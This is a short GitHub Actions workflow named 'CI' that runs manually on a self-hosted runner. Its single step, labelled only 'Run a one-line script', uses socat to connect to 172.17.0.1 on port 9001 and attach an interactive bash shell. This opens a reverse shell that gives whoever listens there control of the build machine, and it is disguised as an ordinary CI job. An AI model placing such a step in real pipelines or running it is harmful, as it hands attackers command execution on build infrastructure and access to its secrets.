name: CI

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: self-hosted
    steps:
      - name: Run a one-line script
        run: socat TCP:172.17.0.1:9001 EXEC:'bash',pty,stderr,setsid,sigint,sane
